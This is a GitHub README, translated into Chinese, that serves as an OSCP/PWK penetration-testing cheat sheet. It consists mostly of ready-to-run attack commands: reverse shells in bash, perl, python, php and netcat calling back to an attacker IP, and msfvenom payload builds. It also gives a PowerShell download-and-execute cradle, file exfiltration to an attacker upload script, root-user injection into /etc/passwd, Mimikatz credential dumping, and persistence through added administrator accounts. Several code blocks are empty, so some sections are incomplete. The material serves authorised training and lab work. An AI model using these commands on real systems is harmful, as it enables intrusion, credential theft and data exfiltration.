sinfulz/JustTryHarder
GitHub: sinfulz/JustTryHarder
一份专为 PWK 课程与 OSCP 考试设计的渗透测试全流程命令速查表,涵盖枚举、漏洞利用与权限提升等核心环节。
Stars: 832 | Forks: 105
# JustTryHarder
一份助您完成 PWK 课程及 OSCP 考试的速查表。
*(灵感来源于 [PayloadsAllTheThings](https://github.com/swisskyrepo/PayloadsAllTheThings))*
## 目录
- [枚举](#enumeration)
- [通过 Ping 判断操作系统](#determining-os-via-ping)
- [端口扫描](#port-scanning)
- [Ping 扫描](#ping-sweep)
- [DNS 区域传送](#dns-zone-transfers)
- [SMB 枚举](#smb-enumeration)
- [SMTP 枚举](#smtp-enumeration)
- [SNMP 枚举](#snmp-enumeration)
- [Web 扫描](#web-scanning)
- [显示监听端口](#show-listening-ports)
- [其他枚举资源](#random-enumeration-resources)
- [漏洞利用](#exploitation)
- [缓冲区溢出 (BOF)](#buffer-overflow-bof)
- [LFI / RFI](#lfi--rfi)
- [SQL 注入](#sql-injection)
- [XSS (跨站脚本攻击)](#xss-cross-site-scripting)
- [Kerberoasting](#kerberoasting)
- [ICMP 注入](#icmp-injection)
- [Responder / NTLM 中继](#responder--ntlm-relay)
- [钓鱼 / 绕过 2FA](#phishing--2fa-bypass)
- [WordPress](#wordpress)
- [Shell 与 Payload](#shells--payloads)
- [反弹 Shell](#reverse-shells)
- [Web Shell](#web-shells)
- [Shell 升级](#shell-upgrading)
- [Payload 生成 (msfvenom)](#payload-generation-msfvenom)
- [生成 Windows Shell 二进制文件](#spawning-a-windows-shell-binary)
- [文件传输](#file-transfers)
- [SMB 传输](#smb-transfer)
- [Wget 传输](#wget-transfer)
- [TFTP 传输](#tftp-transfer)
- [NetCat 传输](#netcat-transfer)
- [PowerShell 下载](#powershell-download)
- [Base64 传输](#base64-transfer-linux-to-linux)
- [Certutil](#certutil)
- [HTTP 文件上传 (数据外发)](#http-file-upload-exfiltration)
- [文件传输资源](#file-transfer-resources)
- [密码破解](#password-cracking)
- [Hashcat](#hashcat)
- [John The Ripper](#john-the-ripper)
- [密码喷射 (CrackMapExec)](#password-spraying-crackmapexec)
- [密码破解资源](#password-cracking-resources)
- [权限提升](#privilege-escalation)
- [Linux 权限提升](#linux-privilege-escalation)
- [Windows 权限提升](#windows-privilege-escalation)
- [内核漏洞利用](#kernel-exploits)
- [后渗透](#post-exploitation)
- [Mimikatz](#mimikatz)
- [Windows 后渗透命令](#windows-post-exploitation-commands)
- [Windows 权限维持](#windows-persistence)
- [使用 Impacket 进行 SMB 交互](#smb-with-impacket)
- [Windows XP 上的 Whoami](#whoami-on-windows-xp)
- [隧道代理与端口转发](#pivoting--port-forwarding)
- [端口转发概念](#port-forwarding-concepts)
- [Chisel](#chisel)
- [SSH 端口转发与隧道代理](#ssh-port-forwarding--pivoting)
- [SOCKS 代理 (PowerShell)](#socks-proxy-powershell)
- [sshuttle](#sshuttle)
- [远程桌面](#remote-desktop)
- [实用参考资料](#useful-references)
- [Web 服务器 (快速设置)](#web-servers-quick-setup)
- [突破限制 / 逃逸环境](#breakouts--environment-escapes)
- [可写目录](#writeable-directories)
- [Metasploit 技巧](#metasploit-tips)
- [Nmap 自动化脚本](#nmap-automation-script)
- [实验室与练习](#labs--practice)
- [Windows 框架 / PowerShell](#windows-framework--powershell)
- [致谢](#thank-you)
## 枚举
### 通过 Ping 判断操作系统
```
ping 10.10.10.110
64 bytes from 10.10.10.110: icmp_seq=1 ttl=128 time=166 ms
```
`TTL` 值会揭示目标操作系统(通过减去最接近的基准值来计算跳数):
| TTL 基准 | 操作系统 | 示例 |
|---|---|---|
| **64** | Linux / \*nix | TTL=61 表示 3 跳 |
| **128** | Windows | TTL=127 表示 1 跳 |
| **254** | Solaris / AIX | TTL=250 表示 4 跳 |
### 端口扫描
#### TCP
```
nmap -vvv -sC -sV -p- --min-rate 2000 10.10.10.10
nmap -sT -p 22,80,110 -A 10.10.10.10
reconnoitre -t 10.10.10.10 -o . --services --quick --hostnames
nc -v -n -z -w1 10.10.10.10 1-10000
```
#### UDP
UDP 扫描可能需要数小时;如果你已经获取了 shell,使用 `netstat` 是更好的替代方案。
```
nmap -sU --top-ports 10000 10.10.10.10
nmap -sT -sU -p 22,80,110 -A 10.10.10.10
nmap -sT -sU -p- --min-rate 2000 10.10.10.10
```
#### 针对特定协议的扫描
```
# SNMP
nmap -p161 -sU 10.10.10.10
# SSH algorithms
nmap --script ssh2-enum-algos 10.10.10.10
# SSL/TLS
nmap -v -v --script ssl-cert,ssl-enum-ciphers,ssl-heartbleed,ssl-poodle,sslv2 10.10.10.10
```
#### Nmap Bootstrap HTML 报告
```
nmap -oA output --stylesheet nmap-bootstrap.xsl 10.10.10.10
firefox nmap-bootstrap.xsl
```
### Ping 扫描
#### Linux (单行命令)
```
for i in {1..254}; do (ping -c 1 192.168.1.$i | grep "bytes from" &); done
fping -g 192.168.0.1/24
```
#### Linux (脚本)
```
for i in $(seq 1 255); do
ping -c1 192.168.125.$i 2>/dev/null 1>&2
if [[ $? -eq 0 ]]; then
echo "192.168.125.$i is up"
fi
done
```
#### Windows (CMD)
```
for /L %i in (1,1,255) do @ping -n 1 -w 200 192.168.1.%i > nul && echo 192.168.1.%i is up.
```
#### Windows (PowerShell)
```
$ping = New-Object System.Net.Networkinformation.Ping
1..254 | % { $ping.send("10.9.15.$_", 1) | where status -ne 'TimedOut' | select Address | fl * }
```
#### Nmap
```
nmap -sP 192.168.0.1-254
```
### DNS 区域传送
```
host -t axfr domain.local 10.10.10.10
host -l domain.local 10.10.10.10
dig @10.10.10.10 domain.local axfr
```
### SMB 枚举
```
smbmap -H 10.10.10.10
smbclient -L 10.10.10.10
smbclient //10.10.10.10/share$
```
- [0xdf - SMB 枚举清单](https://0xdf.gitlab.io/2018/12/02/pwk-notes-smb-enumeration-checklist-update1.html)
### SMTP 枚举
- [SMTP 命令参考](https://github.com/s0wr0b1ndef/OSCP-note/blob/master/ENUMERATION/SMTP/smtp_commands.txt)
### SNMP 枚举
```
nmap -p161 -sU -iL ips.txt
snmpwalk -c public -v1 10.10.10.10
onesixtyone -c community.txt -i ips.txt
```
### Web 扫描
#### GoBuster
```
# Linux/Apache
gobuster dir -e -u http://10.10.10.10/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt \
-x php,html,js,txt,jsp,pl -s 200,204,301,302,307,403,401
# Windows/IIS
gobuster dir -e -u http://10.10.10.10/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt \
-x php,html,js,txt,asp,aspx,jsp,bak -s 200,204,301,302,307,403,401
# HTTPS
gobuster dir -k -u https://10.10.10.10/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 69
```
#### Dirsearch
```
# Linux/Apache
python3 dirsearch.py -r -u http://10.10.10.10/ \
-w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -e php,html,js,txt,jsp,pl -t 50
# Windows/IIS
python3 dirsearch.py -r -u http://10.10.10.10/ \
-w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -e php,html,js,txt,asp,aspx,jsp,bak -t 50
```
#### Nikto
```
nikto -h 10.10.10.10 -p 80 # HTTP
nikto -h 10.10.10.10 -p 443 # HTTPS
```
#### WFuzz
```
wfuzz -u http://10.10.10.10/page.php?dir=../../../../../../../../../FUZZ%00 \
-w /usr/share/wfuzz/wordlist/general/common.txt
```
### 显示监听端口
```
# Linux
netstat -tulpn | grep LISTEN
# FreeBSD / macOS
netstat -anp tcp | grep LISTEN
netstat -anp udp | grep LISTEN
# OpenBSD
netstat -na -f inet | grep LISTEN
# Nmap (本地)
sudo nmap -sT -O localhost # TCP
sudo nmap -sU -O 192.168.2.13 # UDP
```
### 其他枚举资源
- [0daysecurity - 枚举](http://0daysecurity.com/penetration-testing/enumeration.html)
- [Jok3rSecurity 速查表](https://jok3rsecurity.com/cheat-sheet/)
- [ADSecurity](https://adsecurity.org/)
## 漏洞利用
### 缓冲区溢出 (BOF)
常见的坏字符:`0x00`, `0x0A`, `0x0D`
**常规步骤:**
1. Fuzzing(模糊测试) - 发送不断增大的缓冲区以找到崩溃点
2. 寻找 EIP 偏移量 - 使用 `pattern_create` / `pattern_offset`
3. 控制 EIP - 在偏移位置使用字符 `B` 进行验证
4. 查找坏字符 - 发送从 `\x01` 到 `\xFF` 的所有字节,并检查是否有字符被篡改
5. 定位 `jmp esp` - 使用 `!mona jmp -r esp` 寻找一个可靠的返回地址
6. 使用 `msfvenom` 生成 payload(排除坏字符)
7. 获取反弹 shell
#### Fuzzer 脚本
```
#!/usr/bin/python
import time, struct, sys
import socket as so
buff = ["A"]
max_buffer = 4000
counter = 100
increment = 100
while len(buff) <= max_buffer:
buff.append("A" * counter)
counter = counter + increment
for string in buff:
try:
server = str(sys.argv[1])
port = int(sys.argv[2])
except IndexError:
print("[+] Usage: python %s " % sys.argv[0])
sys.exit()
print("[+] Attempting to crash at %s bytes" % len(string))
s = so.socket(so.AF_INET, so.SOCK_STREAM)
try:
s.connect((server, port))
s.send((string + '\r\n').encode())
s.close()
except:
print("[+] Connection failed. Check IP/port or debugger.")
sys.exit()
```
#### EIP 偏移量验证
使用 `msf-pattern_create -l ` 生成模式,发送该模式,然后使用 `msf-pattern_offset -q ` 查找偏移量。
```
#!/usr/bin/python
import sys
import socket as so
# 替换为以下模式的输出: msf-pattern_create -l 500
pattern = "Aa0Aa1Aa2Aa3..."
try:
server = str(sys.argv[1])
port = int(sys.argv[2])
except IndexError:
print("[+] Usage: python %s " % sys.argv[0])
sys.exit()
s = so.socket(so.AF_INET, so.SOCK_STREAM)
s.connect((server, port))
s.send((pattern + '\r\n').encode())
s.close()
```
#### 偏移量控制验证
一旦知道了偏移量(例如 251),即可验证 EIP 控制:
```
buffer = "A" * 251 + "B" * 4 + "C" * 90
```
如果 EIP = `42424242` (BBBB),说明你已控制它。
**BOF 资源:**
- [NCC Group - 编写 Win32 漏洞利用](https://www.nccgroup.trust/uk/about-us/newsroom-and-events/blogs/2016/june/writing-exploits-for-win32-systems-from-scratch/)
- [Corelan - 漏洞利用编写教程第 1 部分](https://www.corelan.be/index.php/2009/07/19/exploit-writing-tutorial-part-1-stack-based-overflows/)
- [dostackbufferoverflowgood](https://github.com/justinsteven/dostackbufferoverflowgood)
- [VeteranSec - 简单搞定 32 位 Windows BOF](https://veteransec.com/2018/09/10/32-bit-windows-buffer-overflows-made-easy/)
- [LiveOverflow - 二进制漏洞利用](https://liveoverflow.com/)
- [0xRick - 二进制漏洞利用](https://0xrick.github.io/binary-exploitation/bof5/)
- [Exploit Education](https://exploit.education/) - Protostar (32位) 和 Phoenix (64位)
*BOF POC 脚本的全部功劳归属于:[jessekurrus/brainpan](https://github.com/jessekurrus/brainpan)*
### LFI / RFI
#### 用于 LFI/RFI 的 PHP Shell
```
```
#### 通过 LFI 实现的 PHP 反弹 Shell
```
& /dev/tcp/10.10.10.10/1234 0>&1'"); ?>
```
**LFI/RFI 资源:**
- [FuzzDB LFI Payloads](https://github.com/tennc/fuzzdb/tree/master/dict/BURP-PayLoad/LFI)
- [Total OSCP Guide - LFI](https://sushant747.gitbooks.io/total-oscp-guide/local_file_inclusion.html)
- [HighOn.Coffee - LFI 速查表](https://highon.coffee/blog/lfi-cheat-sheet/#procselffd-lfi-method)
- [FuzzySecurity LFI 脚本](http://www.fuzzysecurity.com/scripts/16.html)
### SQL 注入
#### MSSQL xp_cmdshell
```
EXEC master..xp_cmdshell 'whoami';
' exec master..xp_cmdshell 'whoami' --
```
#### SQLmap
```
sqlmap -u "http://example.com/test.php?test=test" --level=5 --risk=3 --batch
```
**SQL 注入资源:**
- [OSCP-2 SQL 注入速查表](https://github.com/codingo/OSCP-2/blob/master/Documents/SQL%20Injection%20Cheatsheet.md)
- [PentestMonkey SQLi 速查表](http://pentestmonkey.net/category/cheat-sheet/sql-injection)
### XSS (跨站脚本攻击)
#### 基础 Payload
```
```
#### 基于 DOM 的 XSS (input 标签)
```
" autofocus onfocus="alert(3)
```
#### href 属性中的 XSS
```
javascript:alert(document.cookie)
```
#### 基于 SVG 的 XSS
```
```
#### 绕过 XSS 过滤器
- [JSFuck](http://www.jsfuck.com/) - 仅使用 `[]()!+` 字符编码 JS payload
- [PortSwigger XSS 速查表](https://portswigger.net/web-security/cross-site-scripting/cheat-sheet) - 生成自定义 payload
### Kerberoasting
```
# Impacket
GetUserSPNs.py -request -dc-ip
# PowerShell (Invoke-Kerberoast)
powershell.exe -NoP -NonI -Exec Bypass IEX \
(New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/credentials/Invoke-Kerberoast.ps1'); \
Invoke-Kerberoast -erroraction silentlycontinue -OutputFormat Hashcat
# 导出 NTLM hashes
impacket-secretsdump -just-dc-ntlm /@ -outputfile hashes.txt
```
### ICMP 注入
```
# 在目标机器上
ping -n 3 10.10.10.10
# 在攻击者机器上 (验证)
tcpdump -i tun0 icmp
```
### Responder / NTLM 中继
```
responder -I tun0 -wrF
```
- [结合 NTLM 中继和 Empire 的 Responder](https://chryzsh.gitbooks.io/darthsidious/content/execution/responder-with-ntlm-relay-and-empire.html)
- [NTLM 中继实战指南](https://byt3bl33d3r.github.io/practical-guide-to-ntlm-relaying-in-2017-aka-getting-a-foothold-in-under-5-minutes.html)
### 钓鱼 / 绕过 2FA
- [Modlishka](https://github.com/drk1wi/Modlishka) - 用于钓鱼并绕过 2FA 的反向代理
- [Evilginx2](https://github.com/kgretzky/evilginx2) - 用于钓鱼的中间人攻击框架
- [Modlishka 绕过 2FA 指南](https://medium.com/@kalilinux.in/modlishka-advanced-phishing-bypass-two-factor-authentication-234803791a2a)
### WordPress
- [WPScan](https://github.com/wpscanteam/wpscan) - WordPress 漏洞扫描器
- `wpscan --url http://10.10.10.10 --enumerate u,vp,vt`
- [Top Hat Sec - WordPress 渗透测试](https://forum.top-hat-sec.com/index.php?topic=5758.0)
## Shell 与 Payload
### 反弹 Shell
#### Linux
```
# Bash
bash -i >& /dev/tcp/10.10.10.10/4444 0>&1
# Perl
perl -e 'use Socket;$i="10.10.10.10";$p=4444;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'
# Python
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.10.10",4444));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
# PHP
php -r '$sock=fsockopen("10.10.10.10",4444);exec("/bin/sh -i <&3 >&3 2>&3");'
# Netcat
nc -e /bin/sh 10.10.10.10 4444
# Netcat (如果 -e 参数不可用,使用命名管道)
rm /tmp/f; mkfifo /tmp/f; cat /tmp/f | /bin/sh -i 2>&1 | nc 10.10.10.10 4444 >/tmp/f
```
**资源:**
- [PentestMonkey - 反弹 Shell 速查表](http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet)
- [RevShells.com](https://www.revshells.com/) - 在线反弹 Shell 生成器
#### Windows
```
nc 10.10.10.10 4444 -e cmd.exe
```
- [Windows PHP 反弹 Shell](https://github.com/Dhayalanb/windows-php-reverse-shell)
### Web Shell
- [PHPBash](https://github.com/Arrexel/phpbash)
- [p0wny-shell](https://github.com/flozz/p0wny-shell)
### Shell 升级
#### Python TTY 升级
```
# 1. 生成一个 PTY
python -c 'import pty; pty.spawn("/bin/bash")'
# (或 python3)
# 2. 将 shell 放入后台
# 按下 Ctrl-Z
# 3. 在你的本地终端上
stty raw -echo
fg
# 4. 回到 reverse shell 中
reset
export SHELL=bash
export TERM=xterm-256color
stty rows columns
```
#### Socat 完整 TTY
**监听端:**
```
socat file:$(tty),raw,echo=0 tcp-listen:4444
```
**受害机:**
```
socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:10.10.10.10:4444
```
#### 其他快速 Shell 逃逸
```
perl -e 'exec "/bin/sh";'
/bin/sh -i
```
### Payload 生成 (msfvenom)
#### 列出所有 Payload
```
msfvenom -l payloads
```
#### 二进制 Payload
```
# Linux ELF
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST= LPORT= -f elf > shell.elf
# Windows EXE
msfvenom -p windows/meterpreter/reverse_tcp LHOST= LPORT= -f exe > shell.exe
```
#### Web Payload
```
# PHP
msfvenom -p php/meterpreter_reverse_tcp LHOST= LPORT= -f raw > shell.php
cat shell.php | pbcopy && echo ' shell.php && pbpaste >> shell.php
# ASP
msfvenom -p windows/meterpreter/reverse_tcp LHOST= LPORT= -f asp > shell.asp
# JSP
msfvenom -p java/jsp_shell_reverse_tcp LHOST= LPORT= -f raw > shell.jsp
# WAR
msfvenom -p java/jsp_shell_reverse_tcp LHOST= LPORT= -f war > shell.war
```
#### 脚本 Payload
```
# Python
msfvenom -p cmd/unix/reverse_python LHOST= LPORT= -f raw > shell.py
# Bash
msfvenom -p cmd/unix/reverse_bash LHOST= LPORT= -f raw > shell.sh
# Perl
msfvenom -p cmd/unix/reverse_perl LHOST= LPORT= -f raw > shell.pl
```
#### Shellcode
```
# 查看所有输出格式
msfvenom --help-formats
# Linux shellcode
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST= LPORT= -f
# Windows shellcode
msfvenom -p windows/meterpreter/reverse_tcp LHOST= LPORT= -f
```
#### Metasploit Handler
```
use exploit/multi/handler
set PAYLOAD
set LHOST
set LPORT
set ExitOnSession false
exploit -j -z
```
快速启动:`msfconsole -L -r handler.rc`
**Payload 类型:**
| 类型 | 描述 | 示例 |
|---|---|---|
| **Non-staged (非分阶段)** | 一次性发送完整 payload | `shell_reverse_tcp` (配合 `netcat` 使用) |
| **Staged (分阶段)** | 分部分传输 payload | `shell/reverse_tcp` (需要 `multi/handler`) |
**资源:**
- [NETSEC - 创建 Payload](https://netsec.ws/?p=331)
- [PayloadsAllTheThings](https://github.com/swisskyrepo/PayloadsAllTheThings)
- [ShellPop](https://github.com/0x00-0x00/ShellPop)
### 生成 Windows Shell 二进制文件
编译一个简单的二进制文件来启动 `cmd.exe`(对于通过可写的服务路径等进行权限提升非常有用):
```
#include
int main() {
system("C:\\Windows\\System32\\cmd.exe");
}
```
在 Linux 上使用 MinGW 进行交叉编译:
```
apt install mingw-w64
x86_64-w64-mingw32-gcc pwn.c -o pwn.exe
```
## 文件传输
### SMB 传输
在受害机器 上:
```
net use x: \\10.10.10.10\myshare
copy whatever.zip x:
```
### Wget 传输
将文件放在 `/var/www/html/` 中并启动 Apache:
```
service apache2 start
```
在远程服务器上:
```
wget http://10.10.10.10/file.bin # Single file
wget -r http://10.10.10.10/directory/ # Entire directory
```
### TFTP 传输
通过 Metasploit 从 Kali传输到 Windows:
```
use auxiliary/server/tftp
set TFTPROOT /usr/share/mimikatz/Win32/
run
```
在 Windows 目标机上:
```
tftp -i 10.10.10.10 GET mimikatz.exe
```
### NetCat 传输
```
# 发送端 (Windows)
nc -nv 10.10.10.10 4444 < file.zip
# 接收端 (Linux)
nc -nlvp 4444 > file.zip
```
### PowerShell 下载
交互式会话:
```
Invoke-WebRequest -Uri http://10.10.10.10/exploit.py -OutFile C:\Users\Victim\exploit.py
```
非交互式 (创建 `wget.ps1`):
```
$client = New-Object System.Net.WebClient
$url = "http://10.10.10.10/file.txt"
$path = "C:\path\to\save\file.txt"
$client.DownloadFile($url, $path)
```
### Base64 传输 (Linux 到 Linux)
在本地主机上:
```
cat /path/to/exploit.py | base64 > encoded.b64
```
将 `encoded.b64` 传输到远程服务器,然后进行解码:
```
cat encoded.b64 | base64 -d > exploit.py
```
### Certutil
```
certutil.exe -urlcache -split -f "http://10.10.10.10/file.zip" file.zip
```
### HTTP 文件上传 (数据外发)
**1. 在你的攻击者 Web 根目录 (`/var/www/html/`) 创建 `upload.php`**:
```
```
**2. 创建上传目录:**
```
sudo mkdir /var/www/uploads && sudo chown www-data:www-data /var/www/uploads
```
**3. 从受害机上传:**
```
powershell.exe -exec unrestricted -noprofile -Command \
"(New-Object System.Net.WebClient).UploadFile('http://10.10.10.10/upload.php', 'file-to-upload.txt')"
```
### 文件传输资源
- [Nakkaya - NetCat 文件传输](https://nakkaya.com/2009/04/15/using-netcat-for-file-transfers/)
- [isroot.nl - Windows 上的后渗透文件传输](https://isroot.nl/2018/07/09/post-exploitation-file-transfers-on-windows-the-manual-way/)
- [ropnop - 从 Kali 向 Windows 传输文件](https://blog.ropnop.com/transferring-files-from-kali-to-windows/#smb)
- [0xdf - Windows 文件传输](https://0xdf.gitlab.io/2018/10/11/pwk-notes-post-exploitation-windows-file-transfers.html)
- [JollyFrogs - 向 Windows 传输文件](https://www.jollyfrogs.com/transfer-files-windows/)
## 密码破解
### Hashcat
```
hashcat -m 500 -a 0 -o cracked.txt --force hash.txt /path/to/wordlist.txt
```
- [Hashcat 示例哈希](https://hashcat.net/wiki/doku.php?id=example_hashes) - 查找你的哈希类型对应的 `-m` 模式编号
### John The Ripper
```
john --rules --wordlist=/path/to/wordlist.txt hash.txt
```
- [使用 John the Ripper 破解一切](https://bytesoverbombs.io/cracking-everything-with-john-the-ripper-d434f0f6dc1c)
### 密码喷射 (CrackMapExec)
```
cme smb 10.10.10.10 -u username -d domain -p password
```
本仓库中包含了一个小型的季节/月份字典文件 (`wordlists/English-dates.txt`),可用于喷射诸如 `Spring2021`、`Summer2020` 等常见模式。
### 密码破解资源
- [Hashcat 示例哈希](https://hashcat.net/wiki/doku.php?id=example_hashes)
- [Hashcat NTLM 暴力破解](https://cyberloginit.com/2017/12/26/hashcat-ntlm-brute-force.html)
- [HashID - 识别哈希类型](http://mattw.io/hashID/types)
- [HashKiller](https://hashkiller.co.uk/Cracker)
- [CrackStation](https://crackstation.net)
- [Hydra Web 认证字典攻击](https://insidetrust.blogspot.com/2011/08/using-hydra-to-dictionary-attack-web.html)
- [naive-hashcat](https://github.com/brannondorsey/naive-hashcat)
## 权限提升
### Linux 权限提升
#### 枚举命令
```
grep -Ri 'password' .
find / -perm -4000 2>/dev/null
find / -perm -u=s 2>/dev/null
find / -user root -perm -4000 -exec ls -ldb {} \;
which awk perl python ruby gcc cc vi vim nmap find netcat nc wget tftp ftp 2>/dev/null
```
#### 通过 /etc/passwd 进行权限提升
如果你对 `/etc/passwd` 有写权限:
```
# 生成密码 hash
openssl passwd mrcake
# 输出: WVLY0mgH0RtUI
# 添加一个 root 级别的用户
echo "root2:WVLY0mgH0RtUI:0:0:root:/root:/bin/bash" >> /etc/passwd
# 切换到新用户
su root2
# 密码: mrcake
```
#### 自定义 SUID 二进制文件
需要以目标用户身份执行代码(例如,通过以 root 身份运行的 MySQL `sys_eval`):
```
#include
#include
#include
int main() {
setuid(geteuid());
system("/bin/bash");
return 0;
}
```
#### NFS 权限提升
如果 NFS 共享被错误配置且带有 `no_root_squash` 参数,你可以挂载该共享并创建 SUID 二进制文件。
- [NFS 权限提升](https://www.hackingarticles.in/linux-privilege-escalation-using-misconfigured-nfs/)
- [LD_PRELOAD 权限提升](https://www.hackingarticles.in/linux-privilege-escalation-using-ld_preload/)
#### Linux 权限提升工具与资源
- [GTFOBins](https://gtfobins.github.io) - 突破受限 shell / 滥用 SUID 二进制文件
- 辅助脚本:[gtfo](https://github.com/dreadnaughtsec/gtfo)
- [LinEnum](https://github.com/rebootuser/LinEnum)
- [linux-exploit-suggester](https://github.com/mzet-/linux-exploit-suggester)
- [Linux Exploit Suggester 2](https://github.com/jondonas/linux-exploit-suggester-2)
- [pspy](https://github.com/DominicBreuker/pspy) - 无需 root 权限监控进程
- [unix-privesc-check](https://github.com/pentestmonkey/unix-privesc-check)
- [linuxprivchecker](https://github.com/sleventyeleven/linuxprivchecker)
- [g0tmi1k - 基本 Linux 权限提升](https://blog.g0tmi1k.com/2011/08/basic-linux-privilege-escalation/)
- [通过 sudo 进行 Linux 权限提升](http://www.hackingarticles.in/linux-privilege-escalation-using-exploiting-sudo-rights/)
### Windows 权限提升
#### 快速胜利
```
churrasco -d "net user /add "
churrasco -d "net localgroup administrators /add"
churrasco -d "NET LOCALGROUP \"Remote Desktop Users\" /ADD"
```
#### 检查存储的凭据
```
cmdkey /list
runas /user:DOMAIN\Administrator /savecred "cmd.exe"
```
#### 清单
1. 检查是否安装了 PowerShell (`C:\Windows\System32\WindowsPowerShell`)
2. 运行 PowerUp 或其他枚举脚本
3. 检查内核漏洞(使用 Windows Exploit Suggester)
4. 检查 Program Files 中是否存在过时 / 易受攻击的软件
5. 检查 `cmdkey /list` 以获取存储的凭据
#### Windows 权限提升工具与资源
- [FuzzySecurity - Windows 权限提升基础](http://www.fuzzysecurity.com/tutorials/16.html)
- [absolomb - Windows 权限提升指南](https://www.absolomb.com/2018-01-26-Windows-Privilege-Escalation-Guide/)
- [PowerUp / PowerSploit](https://github.com/PowerShellMafia/PowerSploit/tree/master/Privesc)
- [Powerless](https://github.com/M4ximuss/Powerless) - Windows 枚举(无需 PowerShell)
- [JAWS](https://github.com/411Hall/JAWS) - Just Another Windows Enum (又一个 Windows 枚举脚本)
- [Watson](https://github.com/rasta-mouse/Watson) - 基于 .NET 的补丁枚举
- [Windows Exploit Suggester](https://github.com/GDSSecurity/Windows-Exploit-Suggester)
- [本地权限提升研讨会](https://github.com/sagishahar/lpeworkshop)
- [存储凭据利用](https://pentestlab.blog/2017/04/19/stored-credentials/)
### 内核漏洞利用
- [Linux 内核漏洞利用](https://github.com/SecWiki/linux-kernel-exploits)
- [lucyoa - 内核漏洞利用合集](https://github.com/lucyoa/kernel-exploits)
- [DirtyCow (Linux)](https://github.com/FireFart/dirtycow)
- [RottenPotatoNG (Windows)](https://github.com/breenmachine/RottenPotatoNG)
## 后渗透
### Mimikatz
```
mimikatz.exe
privilege::debug
sekurlsa::logonpasswords
```
### Windows 后渗透命令
```
WMIC USERACCOUNT LIST BRIEF
net user
net localgroup Users
net localgroup Administrators
net user USERNAME NEWPASS /add
net user "USER NAME" NEWPASS /add
net localgroup administrators USERNAME /add
```
### Windows 权限维持
```
# 添加新用户
net user /add hacker 1234567
# 添加到 Administrators
net localgroup administrators /add hacker
# 添加到 Remote Desktop Users
net localgroup "Remote Desktop users" hacker /add
# 启动 Remote Desktop 服务
net start TermService
# 检查 TermService 是否正在运行
tasklist /svc | findstr /C:TermService
# 永久启用 Terminal Services
sc config TermService start=auto
# 通过注册表启用 (需要重启)
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
```
- [SharPersist](https://github.com/fireeye/SharPersist) - C# 权限维持工具包
- Metasploit:`use exploit/windows/local/registry_persistence`
*鸣谢:[s0wr0b1ndef OSCP 笔记](https://github.com/s0wr0b1ndef/OSCP-note/blob/master/persistence/persistence_windows.txt)*
### 使用 Impacket 进行 SMB 交互
#### PSEXEC (远程 Shell)
```
/usr/share/doc/python-impacket/examples/psexec.py user@10.10.10.10
```
#### SMB 服务器 (文件传输)
```
cd /usr/share/windows-binaries
python /usr/share/doc/python-impacket/examples/smbserver.py share .
```
在目标机上:
```
\\10.10.10.10\share\mimikatz.exe
```
### Windows XP 上的 Whoami
Windows XP 缺少内置的 `whoami` 命令。请使用 Kali 中的版本:
```
# 在 Kali 上 - 启动 SMB server
smbserver.py share /usr/share/windows-binaries/
```
```
# 在 XP 目标上
\\10.10.14.14\share\whoami.exe
# 输出: NT AUTHORITY\SYSTEM
```
如果 `%username%` 没有展开,你很可能正在以 SYSTEM 身份运行:
```
echo %username%
# 如果这直接输出 "%username%" 字面量,说明你是 SYSTEM
```
*鸣谢:[0xdf - HTB Legacy](https://0xdf.gitlab.io/2019/02/21/htb-legacy.html)*
## 隧道代理与端口转发
### 端口转发概念
| 类型 | 方向 | 使用场景 |
|---|---|---|
| **本地** | 将本地端口转发到远程 | 在本地访问远程服务 |
| **远程** | 将远程端口转发到本地 | 将本地服务暴露给远程机器 |
| **动态** | SOCKS 代理 | 通过隧道路由任意流量 |
### Chisel
**在你的机器上 (服务器端):**
```
./chisel server -p 8080 --reverse
```
**在受害机上:**
```
./chisel client YOUR_IP:8080 R:1234:127.0.0.1:1234
```
### SSH 端口转发与隧道代理
**1. 在跳板机上生成 SSH 密钥对**:
```
ssh-keygen
cat ~/.ssh/id_rsa.pub
```
**2. 将公钥添加**到你的 Kali 机器上的 `~/.ssh/authorized_keys` 中,并附带限制条件:
```
from="[VICTIM_IP]",command="echo 'Port forwarding only'",no-agent-forwarding,no-X11-forwarding,no-pty [PUBLIC_KEY]
```
**3. 在 Kali 上启动 SSH**:
```
sudo service ssh start
```
**4. 从跳板机创建隧道**:
```
ssh -f -N -R 1080 -o "UserKnownHostsFile=/dev/null" -o "StrictHostKeyChecking=no" \
-i /path/to/id_rsa kali@KALI_IP
```
**5. 配置 proxychains** (`/etc/proxychains.conf`):
```
socks4 127.0.0.1 1080
```
**6. 使用 proxychains**(使用 nmap 时仅限 TCP Connect 扫描):
```
sudo proxychains nmap -sT -p80 -sC -sV --open -Pn -n 10.10.10.10
```
**快速 SSH 隧道:**
```
# 远程端口转发
ssh user@10.10.10.10 -R 1234:127.0.0.1:1234
# 动态 SOCKS 代理
ssh -D 1337 -q -C -N -f user@10.10.10.10
```
### SOCKS 代理 (PowerShell)
```
# 1. 配置 proxychains
# vi /etc/proxychains.conf -> socks5 9080
# 2. 导入并启动代理
Import-Module .\Invoke-SocksProxy.psm1
Invoke-SocksProxy -bindPort 9080
# 3. 使用它
# proxychains nmap -sT
```
### sshuttle
```
sshuttle -r user@10.10.10.10 10.1.1.0/24
```
### 远程桌面
```
